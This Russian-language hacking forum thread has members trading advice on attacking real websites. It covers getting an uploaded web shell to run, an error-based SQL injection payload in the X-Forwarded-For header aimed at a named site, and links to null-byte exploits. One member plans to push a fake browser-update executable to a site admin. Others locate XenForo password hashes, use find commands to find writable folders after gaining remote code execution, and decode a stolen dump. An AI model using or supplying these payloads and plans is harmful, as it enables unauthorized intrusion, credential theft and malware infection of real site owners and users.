[Задай Вопрос - Получи Ответ]

Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php?

 

Мрачно выглядит...

Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.

 

Спасибо, попробую.

 

Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404

 

Изучай:
Null byte PHP bug - https://bugs.php.net/bug.php?id=69418
Nginx FastCGI with nullbyte bug - https://nealpoole.com/blog/2011/08/...ith-null-bytes-php-and-old-versions-of-nginx/
Exploit - https://www.exploit-db.com/exploits/24967

 

Не получается сделать вывод error based, может что-то фильтруется ?

Сайт: http://drop-bux.ru

Уязвимость в заголовках headers

X-Forwarded-For: 1'"

 

Все стандартно крутится: X-Forwarded-For: 123"\'and(extractvalue(1,concat(0x3b,(select(version())))))#

 

Действительно, видать после армии совсем ебанулся, спасибо !

 

Ругается на сокет, значит с пакетами что-то не так. Можно посмотреть что он на сайт отправляет через wireshark, а там довольно читабельно должно быть

 

Могу менять значение max_age. Это php иньекция, или как?

 

Привет, не знаю в какую тему лучше написать, напишу сюда.
Есть сайтик, на нем залит шелл. На сайтике есть сабдомены, у каждого сабдомена есть своя админка.
Задача: заразить с помощью админки самого админа (когда он логинится в свой сабдомен).
Для себя грубо сформулировал последовательность: Админ логинится, в зависимости от ОС/Браузера через н-ое время появляется "Ваш браузер устарел тра-ляля", автоматом загружается "обновление.exe". Т.к. последний раз с малварью имел несколько лет назад (и то поверхостно), сейчас совсем не понимаю реальных возможностей данного способа. Как барузер и ос будут реагировать на данный способ? Где можно взять скрипты фейк обновления по вышеупомянутым параметрам? Возможно есть человек, который сможет реализовать данный задум за разумную цену.

UPD: Возможно, кто-то знает способ более легкий и изящнее, буду рад этой информации...

 

Нет

 

Добрый. Подскажите структуру таблиц базы xenforo, какой у него дефолтный префикс и в какой таблице и колонке хранятся хэш соль?

 

Таблица xf_user_authenticate
колонка data

 

Имею RCE через passthru, имею тысячи папок, как можно найти с правами на запись?)
Поделитесь командой плз

 

find -type f -maxdepth 1 -writable

 

Если папки, то, скорее find -type d -writable 2>/dev/null

 

Подскажите пожалуйста

Скачиваю дамп с одного сайта некоторые файлы в полном порядке и читабельны. Некоторые полностью а некоторые частично вместо значений имеют вот такой знак !~!1 что это означает? И как с этим бороться?

 

Может не текстовый файл?

 

Там должны быть числа единственное что могу предположить что там не на английском. Возможно ли что это связано с кодировкой языка? Там язык далекий от инглиша и если это так какую команду использовать?